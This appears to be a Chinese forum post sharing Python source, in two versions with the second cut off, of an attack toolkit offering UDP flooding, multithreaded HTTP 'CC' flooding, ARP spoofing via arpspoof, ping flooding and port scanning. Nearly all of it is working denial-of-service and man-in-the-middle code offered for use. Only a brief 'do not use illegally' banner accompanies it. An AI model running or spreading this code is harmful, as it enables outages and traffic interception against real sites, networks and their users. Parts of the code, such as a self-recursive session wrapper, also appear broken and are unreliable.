本帖最后由 Zephyr 于 2025-11-2 14:18 编辑
import time
import socket
import random
import os
import threading
import requests
from datetime import datetime
import concurrent.futures
import urllib3
from requests.adapters import HTTPAdapter
import sys
import subprocess
# 禁用安全警告
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# 颜色代码
class Colors:
RED = '\033[91m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
BLUE = '\033[94m'
PURPLE = '\033[95m'
CYAN = '\033[96m'
WHITE = '\033[97m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
def print_banner():
"""打印辉煌的横幅"""
os.system("clear")
print(f"{Colors.PURPLE}{'='*60}{Colors.END}")
print(f"{Colors.CYAN}{Colors.BOLD}")
print(" ╔══════════════════════════════════╗")
print(" ║ 帝兵-筷子 终极版 ║")
print(" ║ EMPEROR WEAPON - CHOPSTICKS ║")
print(" ╚══════════════════════════════════╝")
print(f"{Colors.END}")
print(f"{Colors.YELLOW} 网络安全测试工具集合")
print(f"{Colors.GREEN} 作者: 跨紫大帝")
print(f"{Colors.RED} 警告:请勿用于非法用途")
print(f"{Colors.PURPLE}{'='*60}{Colors.END}")
def print_menu():
"""打印菜单"""
print(f"\n{Colors.CYAN}{Colors.BOLD}🏹 请选择攻击模式:{Colors.END}")
print(f"{Colors.GREEN}┌────────────────────────────────────────────┐")
print(f"│ {Colors.YELLOW}1.{Colors.END} 🔥 UDP洪水攻击 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}2.{Colors.END} ⚡ 超级CC攻击 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}3.{Colors.END} 🌐 ARP欺骗攻击 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}4.{Colors.END} 🔍 快速端口扫描 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}5.{Colors.END} 🎯 Ping洪水攻击 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}6.{Colors.END} ❌ 退出程序 {Colors.GREEN}│")
print(f"└────────────────────────────────────────────┘{Colors.END}")
def is_valid_ip(ip):
"""验证IP地址格式"""
try:
socket.inet_aton(ip)
return True
except socket.error:
return False
def get_mac(ip):
"""获取IP对应的MAC地址"""
try:
# 使用arp命令获取MAC地址
result = subprocess.check_output(f"arp -n {ip}", shell=True, text=True)
lines = result.split('\n')
for line in lines:
if ip in line:
parts = line.split()
if len(parts) >= 3:
return parts[2]
return None
except:
return None
def arp_spoof():
"""ARP欺骗攻击"""
print_banner()
print(f"\n{Colors.CYAN}{Colors.BOLD}🌐 ARP欺骗攻击模式{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
target_ip = input(f"{Colors.YELLOW}🎯 目标IP: {Colors.END}")
gateway_ip = input(f"{Colors.YELLOW}🌐 网关IP: {Colors.END}")
if not is_valid_ip(target_ip) or not is_valid_ip(gateway_ip):
print(f"{Colors.RED}❌ IP地址格式错误!{Colors.END}")
return
print(f"\n{Colors.YELLOW}🔍 正在获取MAC地址...{Colors.END}")
target_mac = get_mac(target_ip)
gateway_mac = get_mac(gateway_ip)
if not target_mac or not gateway_mac:
print(f"{Colors.RED}❌ 无法获取MAC地址,请检查网络连接{Colors.END}")
return
print(f"{Colors.GREEN}✅ 目标MAC: {target_mac}{Colors.END}")
print(f"{Colors.GREEN}✅ 网关MAC: {gateway_mac}{Colors.END}")
print(f"\n{Colors.RED}💥 开始ARP欺骗攻击...{Colors.END}")
print(f"{Colors.YELLOW}🎯 目标: {target_ip} -> 网关: {gateway_ip}{Colors.END}")
print(f"{Colors.RED}⏹️ 按 Ctrl+C 停止攻击{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
stop_attack = False
sent_packets = 0
start_time = time.time()
try:
while not stop_attack:
try:
# 发送ARP欺骗包 - 告诉目标我是网关
cmd1 = f"arpspoof -i wlan0 -t {target_ip} {gateway_ip} > /dev/null 2>&1 &"
# 发送ARP欺骗包 - 告诉网关我是目标
cmd2 = f"arpspoof -i wlan0 -t {gateway_ip} {target_ip} > /dev/null 2>&1 &"
os.system(cmd1)
os.system(cmd2)
sent_packets += 2
elapsed_time = time.time() - start_time
print(f"\r{Colors.GREEN}📤 已发送: {sent_packets} ARP包 | ⏱️ 时长: {elapsed_time:.1f}秒 | 🎯 目标: {target_ip} <-> 网关: {gateway_ip}{Colors.END}", end="", flush=True)
time.sleep(2) # 每2秒发送一次
except Exception as e:
print(f"\n{Colors.RED}❌ 发送ARP包失败: {e}{Colors.END}")
time.sleep(1)
except KeyboardInterrupt:
stop_attack = True
print(f"\n\n{Colors.YELLOW}🛑 停止ARP攻击,恢复ARP表...{Colors.END}")
# 恢复ARP表
try:
os.system("pkill arpspoof")
time.sleep(2)
print(f"{Colors.GREEN}✅ ARP表已恢复{Colors.END}")
except:
print(f"{Colors.RED}❌ 恢复ARP表失败{Colors.END}")
def quick_port_scan():
"""快速端口扫描"""
print_banner()
print(f"\n{Colors.CYAN}{Colors.BOLD}🔍 快速端口扫描{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
target = input(f"{Colors.YELLOW}🎯 目标IP或域名: {Colors.END}")
# 常见端口列表
common_ports = [21, 22, 23, 25, 53, 80, 110, 143, 443, 993, 995,
2082, 2083, 2086, 2087, 2095, 3306, 3389, 5432, 5900, 8080, 8443]
print(f"\n{Colors.GREEN}🚀 快速扫描 {Colors.CYAN}{target}{Colors.GREEN} 的 {len(common_ports)} 个常见端口{Colors.END}")
print(f"{Colors.YELLOW}⏳ 扫描中...{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
open_ports = []
start_time = time.time()
def scan_port(port):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2)
result = sock.connect_ex((target, port))
sock.close()
return port, result == 0
except:
return port, False
with concurrent.futures.ThreadPoolExecutor(max_workers=50) as executor:
future_to_port = {executor.submit(scan_port, port): port for port in common_ports}
for i, future in enumerate(concurrent.futures.as_completed(future_to_port)):
port, is_open = future.result()
if is_open:
open_ports.append(port)
progress = ((i + 1) / len(common_ports)) * 100
print(f"\r{Colors.CYAN}📈 进度: {progress:.1f}% | 🟢 发现开放端口: {len(open_ports)}{Colors.END}", end="", flush=True)
elapsed_time = time.time() - start_time
print(f"\n\n{Colors.GREEN}✅ 扫描完成!耗时: {elapsed_time:.1f}秒{Colors.END}")
if open_ports:
print(f"\n{Colors.GREEN}🎯 开放的端口:{Colors.END}")
common_services = {
21: "FTP", 22: "SSH", 23: "Telnet", 25: "SMTP", 53: "DNS",
80: "HTTP", 110: "POP3", 143: "IMAP", 443: "HTTPS", 993: "IMAPS",
995: "POP3S", 2082: "cPanel", 2083: "cPanel SSL", 2086: "WHM",
2087: "WHM SSL", 2095: "Webmail", 3306: "MySQL", 3389: "RDP",
5432: "PostgreSQL", 5900: "VNC", 8080: "HTTP-alt", 8443: "HTTPS-alt"
}
for port in sorted(open_ports):
service = common_services.get(port, "未知服务")
status_color = Colors.GREEN if port in [80, 443, 22] else Colors.YELLOW
print(f" {status_color}Port {port}/TCP{Colors.END} - {Colors.CYAN}{service}{Colors.END}")
else:
print(f"{Colors.RED}❌ 没有发现开放的常见端口{Colors.END}")
def super_cc_attack():
"""超级CC攻击(带详细过程显示)"""
print_banner()
print(f"\n{Colors.CYAN}{Colors.BOLD}⚡ 超级CC攻击模式{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
url = input(f"{Colors.YELLOW}🎯 目标URL (包含http://): {Colors.END}")
threads_count = int(input(f"{Colors.YELLOW}⚡ 攻击线程数(10-500): {Colors.END}"))
if threads_count < 10:
threads_count = 10
if threads_count > 500:
threads_count = 500
print(f"\n{Colors.RED}💥 开始超级CC攻击 {Colors.CYAN}{url}{Colors.END}")
print(f"{Colors.YELLOW}🎯 攻击线程: {threads_count}{Colors.END}")
print(f"{Colors.RED}⏹️ 按 Ctrl+C 停止攻击{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
stop_attack = False
total_requests = 0
successful_requests = 0
failed_requests = 0
start_time = time.time()
# 统计信息
status_codes = {}
last_print_time = time.time()
# 用户代理列表
user_agents = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36',
'Mozilla/5.0 (iPhone; CPU iPhone OS 14_0 like Mac OS X) AppleWebKit/537.36',
'Mozilla/5.0 (Android 10; Mobile) AppleWebKit/537.36'
]
def http_flood(thread_id):
nonlocal total_requests, successful_requests, failed_requests
session = create_session()
while not stop_attack:
try:
headers = {
'User-Agent': random.choice(user_agents),
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Cache-Control': 'no-cache',
'Connection': 'keep-alive'
}
response = session.get(url, headers=headers, verify=False, timeout=2)
successful_requests += 1
# 统计状态码
status_code = response.status_code
status_codes[status_code] = status_codes.get(status_code, 0) + 1
except Exception as e:
failed_requests += 1
finally:
total_requests += 1
# 启动攻击线程
threads = []
for i in range(threads_count):
thread = threading.Thread(target=http_flood, args=(i,))
thread.daemon = True
threads.append(thread)
thread.start()
# 实时显示攻击过程
last_total = 0
try:
while not stop_attack:
current_time = time.time()
elapsed_time = current_time - start_time
# 每秒更新显示
if current_time - last_print_time >= 0.5:
current_total = total_requests
requests_per_sec = (current_total - last_total) * 2 # 因为是0.5秒更新
last_total = current_total
last_print_time = current_time
avg_speed = current_total / elapsed_time if elapsed_time > 0 else 0
# 清屏并显示攻击面板
os.system('clear')
print(f"{Colors.RED}{Colors.BOLD}")
print("╔══════════════════════════════════════════════════════════════╗")
print("║ ⚡ 超级CC攻击进行中 ⚡ ║")
print("╚══════════════════════════════════════════════════════════════╝")
print(f"{Colors.END}")
print(f"{Colors.CYAN}🎯 攻击目标: {Colors.YELLOW}{url}{Colors.END}")
print(f"{Colors.CYAN}🚀 攻击线程: {Colors.GREEN}{threads_count}{Colors.END}")
print(f"{Colors.CYAN}⏱️ 攻击时长: {Colors.YELLOW}{elapsed_time:.1f}秒{Colors.END}")
print()
# 主要统计信息
print(f"{Colors.GREEN}📊 总请求数: {Colors.WHITE}{total_requests:,}{Colors.END}")
print(f"{Colors.GREEN}✅ 成功请求: {Colors.WHITE}{successful_requests:,}{Colors.END}")
print(f"{Colors.RED}❌ 失败请求: {Colors.WHITE}{failed_requests:,}{Colors.END}")
print()
# 速度信息
print(f"{Colors.YELLOW}⚡ 实时速度: {Colors.WHITE}{requests_per_sec:,.0f} 请求/秒{Colors.END}")
print(f"{Colors.YELLOW}📈 平均速度: {Colors.WHITE}{avg_speed:,.0f} 请求/秒{Colors.END}")
print()
# 状态码分布
if status_codes:
print(f"{Colors.CYAN}🎯 HTTP状态码分布:{Colors.END}")
for code, count in sorted(status_codes.items()):
color = Colors.GREEN if code == 200 else Colors.YELLOW if code < 400 else Colors.RED
print(f" {color}HTTP {code}: {count:,}{Colors.END}")
print()
# 攻击强度显示
intensity = min(threads_count // 10, 50)
print(f"{Colors.RED}💥 攻击强度: {Colors.WHITE}{'█' * intensity}{'░' * (50 - intensity)}{Colors.END}")
print()
print(f"{Colors.RED}⏹️ 按 Ctrl+C 停止攻击{Colors.END}")
time.sleep(0.1)
except KeyboardInterrupt:
stop_attack = True
print(f"\n\n{Colors.RED}🛑 攻击停止!{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
final_stats = f"""
{Colors.CYAN}📊 最终攻击统计:{Colors.END}
{Colors.YELLOW}⏱️ 总运行时间: {Colors.GREEN}{time.time() - start_time:.1f}秒{Colors.END}
{Colors.YELLOW}📨 总请求数: {Colors.GREEN}{total_requests:,}{Colors.END}
{Colors.YELLOW}✅ 成功请求: {Colors.GREEN}{successful_requests:,}{Colors.END}
{Colors.YELLOW}❌ 失败请求: {Colors.RED}{failed_requests:,}{Colors.END}
{Colors.YELLOW}📈 平均速度: {Colors.GREEN}{total_requests/(time.time() - start_time):.0f} 请求/秒{Colors.END}
"""
print(final_stats)
def create_session():
"""创建优化的session"""
session = requests.Session()
adapter = HTTPAdapter(pool_connections=100, pool_maxsize=100, max_retries=0)
session.mount('http://', adapter)
session.mount('https://', adapter)
session.request = lambda method, url, **kwargs: session.request(
method, url, timeout=2, **kwargs
)
return session
def udp_flood():
"""UDP洪水攻击"""
print_banner()
print(f"\n{Colors.CYAN}{Colors.BOLD}🔥 UDP洪水攻击模式{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
ip = input(f"{Colors.YELLOW}🎯 目标IP: {Colors.END}")
port = int(input(f"{Colors.YELLOW}🎯 目标端口: {Colors.END}"))
speed = int(input(f"{Colors.YELLOW}⚡ 攻击速度(1~1000): {Colors.END}"))
print(f"\n{Colors.RED}💥 开始UDP攻击 {Colors.CYAN}{ip}:{port}{Colors.END}")
print(f"{Colors.RED}⏹️ 按 Ctrl+C 停止攻击{Colors.END}")
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes_data = random._urandom(1490)
sent = 0
start_time = time.time()
try:
while True:
sock.sendto(bytes_data, (ip, port))
sent += 1
elapsed_time = time.time() - start_time
speed_actual = sent / elapsed_time if elapsed_time > 0 else 0
print(f"\r{Colors.GREEN}📤 已发送: {sent:,} 包 | ⚡ 速度: {speed_actual:.0f} 包/秒 | ⏱️ 时长: {elapsed_time:.1f}秒{Colors.END}", end="", flush=True)
time.sleep((1000 - speed) / 2000)
except KeyboardInterrupt:
print(f"\n\n{Colors.RED}🛑 UDP攻击停止,总共发送 {sent:,} 个数据包{Colors.END}")
except Exception as e:
print(f"\n{Colors.RED}❌ 发生错误: {e}{Colors.END}")
finally:
sock.close()
def ping_flood():
"""Ping洪水攻击"""
print_banner()
print(f"\n{Colors.CYAN}{Colors.BOLD}🎯 Ping洪水攻击模式{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
ip = input(f"{Colors.YELLOW}🎯 目标IP: {Colors.END}")
print(f"\n{Colors.RED}💥 开始Ping攻击 {Colors.CYAN}{ip}{Colors.END}")
print(f"{Colors.RED}⏹️ 按 Ctrl+C 停止攻击{Colors.END}")
sent = 0
start_time = time.time()
try:
while True:
# 使用系统ping命令
response = os.system(f"ping -c 1 -s 65500 {ip} > /dev/null 2>&1")
sent += 1
elapsed_time = time.time() - start_time
speed_actual = sent / elapsed_time if elapsed_time > 0 else 0
print(f"\r{Colors.GREEN}📤 已发送: {sent:,} Ping包 | ⚡ 速度: {speed_actual:.1f} 包/秒 | ⏱️ 时长: {elapsed_time:.1f}秒{Colors.END}", end="", flush=True)
except KeyboardInterrupt:
print(f"\n\n{Colors.RED}🛑 Ping攻击停止,总共发送 {sent:,} 个数据包{Colors.END}")
def main_menu():
"""主菜单"""
while True:
print_banner()
print_menu()
choice = input(f"\n{Colors.YELLOW}🎯 请选择功能 (1-6): {Colors.END}")
if choice == '1':
udp_flood()
elif choice == '2':
super_cc_attack()
elif choice == '3':
arp_spoof()
elif choice == '4':
quick_port_scan()
elif choice == '5':
ping_flood()
elif choice == '6':
print(f"\n{Colors.CYAN}👋 感谢使用帝兵-筷子,再见!{Colors.END}")
exit()
else:
print(f"\n{Colors.RED}❌ 无效选择,请重新输入{Colors.END}")
time.sleep(1)
continue
input(f"\n{Colors.YELLOW}⏎ 按回车键返回主菜单...{Colors.END}")
if __name__ == "__main__":
try:
main_menu()
except KeyboardInterrupt:
print(f"\n\n{Colors.CYAN}👋 程序已退出{Colors.END}") |
import socket
import random
import os
import threading
import requests
from datetime import datetime
import urllib3
import sys
import subprocess
# 尝试导入并发库,如果失败使用备用方案
try:
from concurrent.futures import ThreadPoolExecutor
HAS_CONCURRENT = True
except ImportError:
HAS_CONCURRENT = False
print("警告: concurrent.futures 不可用,使用线程模式")
try:
from requests.adapters import HTTPAdapter
HAS_REQUESTS_ADAPTER = True
except ImportError:
HAS_REQUESTS_ADAPTER = False
# 禁用安全警告
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# 颜色代码
class Colors:
RED = '\033[91m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
BLUE = '\033[94m'
PURPLE = '\033[95m'
CYAN = '\033[96m'
WHITE = '\033[97m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
def print_banner():
"""打印辉煌的横幅"""
os.system("clear")
print(f"{Colors.PURPLE}{'='*60}{Colors.END}")
print(f"{Colors.CYAN}{Colors.BOLD}")
print(" ╔══════════════════════════════════╗")
print(" ║ 帝兵-筷子 终极版 ║")
print(" ║ EMPEROR WEAPON - CHOPSTICKS ║")
print(" ╚══════════════════════════════════╝")
print(f"{Colors.END}")
print(f"{Colors.YELLOW} 网络安全测试工具集合")
print(f"{Colors.GREEN} 作者: 跨紫大帝")
print(f"{Colors.RED} 警告:请勿用于非法用途")
print(f"{Colors.PURPLE}{'='*60}{Colors.END}")
def print_menu():
"""打印菜单"""
print(f"\n{Colors.CYAN}{Colors.BOLD}🏹 请选择攻击模式:{Colors.END}")
print(f"{Colors.GREEN}┌────────────────────────────────────────────┐")
print(f"│ {Colors.YELLOW}1.{Colors.END} 🔥 UDP洪水攻击 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}2.{Colors.END} ⚡ 超级CC攻击 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}3.{Colors.END} 🌐 ARP欺骗攻击 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}4.{Colors.END} 🔍 快速端口扫描 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}5.{Colors.END} 🎯 Ping洪水攻击 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}6.{Colors.END} 📊 系统信息 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}7.{Colors.END} ❌ 退出程序 {Colors.GREEN}│")
print(f"└────────────────────────────────────────────┘{Colors.END}")
def check_dependencies():
"""检查依赖是否安装"""
missing_deps = []
try:
import requests
except ImportError:
missing_deps.append("requests")
try:
import urllib3
except ImportError:
missing_deps.append("urllib3")
return missing_deps
def show_system_info():
"""显示系统信息"""
print_banner()
print(f"\n{Colors.CYAN}{Colors.BOLD}📊 系统信息{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
# Python信息
print(f"{Colors.YELLOW}🐍 Python版本: {Colors.GREEN}{sys.version}{Colors.END}")
# 检查依赖
missing_deps = check_dependencies()
if missing_deps:
print(f"{Colors.RED}❌ 缺少依赖: {', '.join(missing_deps)}{Colors.END}")
print(f"{Colors.YELLOW}💡 请运行: pip install {' '.join(missing_deps)}{Colors.END}")
else:
print(f"{Colors.GREEN}✅ 所有依赖已安装{Colors.END}")
# 网络信息
try:
hostname = socket.gethostname()
print(f"{Colors.YELLOW}🌐 主机名: {Colors.GREEN}{hostname}{Colors.END}")
except:
pass
# 系统时间
print(f"{Colors.YELLOW}⏰ 系统时间: {Colors.GREEN}{datetime.now().strftime('%Y-%m-%d %H:%M:%S')}{Colors.END}")
input(f"\n{Colors.YELLOW}⏎ 按回车键返回主菜单...{Colors.END}")
def is_valid_ip(ip):
"""验证IP地址格式"""
try:
socket.inet_aton(ip)
return True
except socket.error:
return False
def get_mac(ip):
"""获取IP对应的MAC地址"""
try:
# 使用arp命令获取MAC地址
result = subprocess.check_output(f"arp -n {ip}", shell=True, text=True, stderr=subprocess.DEVNULL)
lines = result.split('\n')
for line in lines:
if ip in line:
parts = line.split()
if len(parts) >= 3:
return parts[2]
return None
except:
return None
def check_arpspoof():
"""检查arpspoof是否可用"""
try:
subprocess.run(["which", "arpspoof"], check=True, capture_output=True)
return True
except:
return False
def arp_spoof():
"""ARP欺骗攻击"""
print_banner()
print(f"\n{Colors.CYAN}{Colors.BOLD}🌐 ARP欺骗攻击模式{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
# 检查arpspoof是否安装
if not check_arpspoof():
print(f"{Colors.RED}❌ arpspoof 未安装!{Colors.END}")
print(f"{Colors.YELLOW}💡 请运行: pkg install dsniff{Colors.END}")
input(f"\n{Colors.YELLOW}⏎ 按回车键返回主菜单...{Colors.END}")
return
target_ip = input(f"{Colors.YELLOW}🎯 目标IP: {Colors.END}")
gateway_ip = input(f"{Colors.YELLOW}🌐 网关IP: {Colors.END}")
if not is_valid_ip(target_ip) or not is_valid_ip(gateway_ip):
print(f"{Colors.RED}❌ IP地址格式错误!{
使用道具 举报
import socket
import random
import os
import threading
import requests
from datetime import datetime
import urllib3
import sys
import subprocess
# 尝试导入并发库,如果失败使用备用方案
try:
from concurrent.futures import ThreadPoolExecutor
HAS_CONCURRENT = True
except ImportError:
HAS_CONCURRENT = False
print("警告: concurrent.futures 不可用,使用线程模式")
try:
from requests.adapters import HTTPAdapter
HAS_REQUESTS_ADAPTER = True
except ImportError:
HAS_REQUESTS_ADAPTER = False
# 禁用安全警告
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# 颜色代码
class Colors:
RED = '\033[91m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
BLUE = '\033[94m'
PURPLE = '\033[95m'
CYAN = '\033[96m'
WHITE = '\033[97m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
def print_banner():
"""打印辉煌的横幅"""
os.system("clear")
print(f"{Colors.PURPLE}{'='*60}{Colors.END}")
print(f"{Colors.CYAN}{Colors.BOLD}")
print(" ╔══════════════════════════════════╗")
print(" ║ 帝兵-筷子 终极版 ║")
print(" ║ EMPEROR WEAPON - CHOPSTICKS ║")
print(" ╚══════════════════════════════════╝")
print(f"{Colors.END}")
print(f"{Colors.YELLOW} 网络安全测试工具集合")
print(f"{Colors.GREEN} 作者: 跨紫大帝")
print(f"{Colors.RED} 警告:请勿用于非法用途")
print(f"{Colors.PURPLE}{'='*60}{Colors.END}")
def print_menu():
"""打印菜单"""
print(f"\n{Colors.CYAN}{Colors.BOLD}🏹 请选择攻击模式:{Colors.END}")
print(f"{Colors.GREEN}┌────────────────────────────────────────────┐")
print(f"│ {Colors.YELLOW}1.{Colors.END} 🔥 UDP洪水攻击 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}2.{Colors.END} ⚡ 超级CC攻击 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}3.{Colors.END} 🌐 ARP欺骗攻击 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}4.{Colors.END} 🔍 快速端口扫描 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}5.{Colors.END} 🎯 Ping洪水攻击 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}6.{Colors.END} 📊 系统信息 {Colors.GREEN}│")
print(f"│ {Colors.YELLOW}7.{Colors.END} ❌ 退出程序 {Colors.GREEN}│")
print(f"└────────────────────────────────────────────┘{Colors.END}")
def check_dependencies():
"""检查依赖是否安装"""
missing_deps = []
try:
import requests
except ImportError:
missing_deps.append("requests")
try:
import urllib3
except ImportError:
missing_deps.append("urllib3")
return missing_deps
def show_system_info():
"""显示系统信息"""
print_banner()
print(f"\n{Colors.CYAN}{Colors.BOLD}📊 系统信息{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
# Python信息
print(f"{Colors.YELLOW}🐍 Python版本: {Colors.GREEN}{sys.version}{Colors.END}")
# 检查依赖
missing_deps = check_dependencies()
if missing_deps:
print(f"{Colors.RED}❌ 缺少依赖: {', '.join(missing_deps)}{Colors.END}")
print(f"{Colors.YELLOW}💡 请运行: pip install {' '.join(missing_deps)}{Colors.END}")
else:
print(f"{Colors.GREEN}✅ 所有依赖已安装{Colors.END}")
# 网络信息
try:
hostname = socket.gethostname()
print(f"{Colors.YELLOW}🌐 主机名: {Colors.GREEN}{hostname}{Colors.END}")
except:
pass
# 系统时间
print(f"{Colors.YELLOW}⏰ 系统时间: {Colors.GREEN}{datetime.now().strftime('%Y-%m-%d %H:%M:%S')}{Colors.END}")
input(f"\n{Colors.YELLOW}⏎ 按回车键返回主菜单...{Colors.END}")
def is_valid_ip(ip):
"""验证IP地址格式"""
try:
socket.inet_aton(ip)
return True
except socket.error:
return False
def get_mac(ip):
"""获取IP对应的MAC地址"""
try:
# 使用arp命令获取MAC地址
result = subprocess.check_output(f"arp -n {ip}", shell=True, text=True, stderr=subprocess.DEVNULL)
lines = result.split('\n')
for line in lines:
if ip in line:
parts = line.split()
if len(parts) >= 3:
return parts[2]
return None
except:
return None
def check_arpspoof():
"""检查arpspoof是否可用"""
try:
subprocess.run(["which", "arpspoof"], check=True, capture_output=True)
return True
except:
return False
def arp_spoof():
"""ARP欺骗攻击"""
print_banner()
print(f"\n{Colors.CYAN}{Colors.BOLD}🌐 ARP欺骗攻击模式{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
# 检查arpspoof是否安装
if not check_arpspoof():
print(f"{Colors.RED}❌ arpspoof 未安装!{Colors.END}")
print(f"{Colors.YELLOW}💡 请运行: pkg install dsniff{Colors.END}")
input(f"\n{Colors.YELLOW}⏎ 按回车键返回主菜单...{Colors.END}")
return
target_ip = input(f"{Colors.YELLOW}🎯 目标IP: {Colors.END}")
gateway_ip = input(f"{Colors.YELLOW}🌐 网关IP: {Colors.END}")
if not is_valid_ip(target_ip) or not is_valid_ip(gateway_ip):
print(f"{Colors.RED}❌ IP地址格式错误!{Colors.END}")
return
print(f"\n{Colors.YELLOW}🔍 正在获取MAC地址...{Colors.END}")
target_mac = get_mac(target_ip)
gateway_mac = get_mac(gateway_ip)
if not target_mac:
print(f"{Colors.RED}❌ 无法获取目标MAC地址{Colors.END}")
return
if not gateway_mac:
print(f"{Colors.RED}❌ 无法获取网关MAC地址{Colors.END}")
return
print(f"{Colors.GREEN}✅ 目标MAC: {target_mac}{Colors.END}")
print(f"{Colors.GREEN}✅ 网关MAC: {gateway_mac}{Colors.END}")
print(f"\n{Colors.RED}💥 开始ARP欺骗攻击...{Colors.END}")
print(f"{Colors.YELLOW}🎯 目标: {target_ip} -> 网关: {gateway_ip}{Colors.END}")
print(f"{Colors.RED}⏹️ 按 Ctrl+C 停止攻击{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
stop_attack = False
sent_packets = 0
start_time = time.time()
arpspoof_processes = []
try:
while not stop_attack:
try:
# 发送ARP欺骗包
proc1 = subprocess.Popen(["arpspoof", "-i", "wlan0", "-t", target_ip, gateway_ip],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
proc2 = subprocess.Popen(["arpspoof", "-i", "wlan0", "-t", gateway_ip, target_ip],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
arpspoof_processes.extend([proc1, proc2])
sent_packets += 2
elapsed_time = time.time() - start_time
print(f"\r{Colors.GREEN}📤 已发送: {sent_packets} ARP包 | ⏱️ 时长: {elapsed_time:.1f}秒 | 🎯 目标: {target_ip} <-> 网关: {gateway_ip}{Colors.END}", end="", flush=True)
time.sleep(2)
# 清理旧的进程
for proc in arpspoof_processes[:]:
if proc.poll() is not None:
arpspoof_processes.remove(proc)
except Exception as e:
print(f"\n{Colors.RED}❌ 发送ARP包失败: {e}{Colors.END}")
time.sleep(1)
except KeyboardInterrupt:
stop_attack = True
print(f"\n\n{Colors.YELLOW}🛑 停止ARP攻击,恢复ARP表...{Colors.END}")
# 杀死所有arpspoof进程
for proc in arpspoof_processes:
try:
proc.terminate()
except:
pass
# 额外清理
os.system("pkill arpspoof 2>/dev/null")
time.sleep(2)
print(f"{Colors.GREEN}✅ ARP表已恢复{Colors.END}")
def quick_port_scan():
"""快速端口扫描"""
print_banner()
print(f"\n{Colors.CYAN}{Colors.BOLD}🔍 快速端口扫描{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
target = input(f"{Colors.YELLOW}🎯 目标IP或域名: {Colors.END}")
# 常见端口列表
common_ports = [21, 22, 23, 25, 53, 80, 110, 143, 443, 993, 995,
2082, 2083, 2086, 2087, 2095, 3306, 3389, 5432, 5900, 8080, 8443]
print(f"\n{Colors.GREEN}🚀 快速扫描 {Colors.CYAN}{target}{Colors.GREEN} 的 {len(common_ports)} 个常见端口{Colors.END}")
print(f"{Colors.YELLOW}⏳ 扫描中...{Colors.END}")
print(f"{Colors.GREEN}{'─'*50}{Colors.END}")
open_ports = []
start_time = time.time()
def scan_port(port):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2)
result = sock.connect_ex((target, port))
sock.close()
return port, result == 0
except:
return port, False
# 使用多线程扫描
threads = []
for port in common_ports:
thread = threading.Thread(target=lambda p=port: open_ports.append(p) if scan_port(p)[1] else None)
threads.append(thread)
thread.start()
# 显示进度
for i, thread in enumerate(threads):
thread.join()
progress = ((i + 1) / len(common_ports)) * 100
print(f"\r{Colors.CYAN}📈 进度: {progress:.1f}% | 🟢 发现开放端口: {len(open_ports)}{Colors.END}", end="", flush=True)
elapsed_time = time.time() - start_time
print(f"\n\n{Colors.GREEN}✅ 扫描完成!耗时: {elapsed_time:.1f}秒{Colors.END}")
if open_ports:
print(f"\n{Colors.GREEN}🎯 开放的端口:{Colors.END}")
common_services = {
21: "FTP", 22: "SSH", 23: "Telnet", 25: "SMTP", 53: "DNS",
80: "HTTP", 110: "POP3", 143: "IMAP", 443: "HTTPS", 993: "IMAPS",
995: "POP3S", 2082: "cPanel", 2083: "cPanel SSL", 2086: "WHM",
2087: "WHM SSL", 2095: "Webmail", 3306: "MySQL", 3389: "RDP",
5432: "PostgreSQL", 5900: "VNC", 8080: "HTTP-alt", 8443: "HTTPS-alt"
}
for port in sorted(open_ports):
service = common_services.get(port, "未知服务")
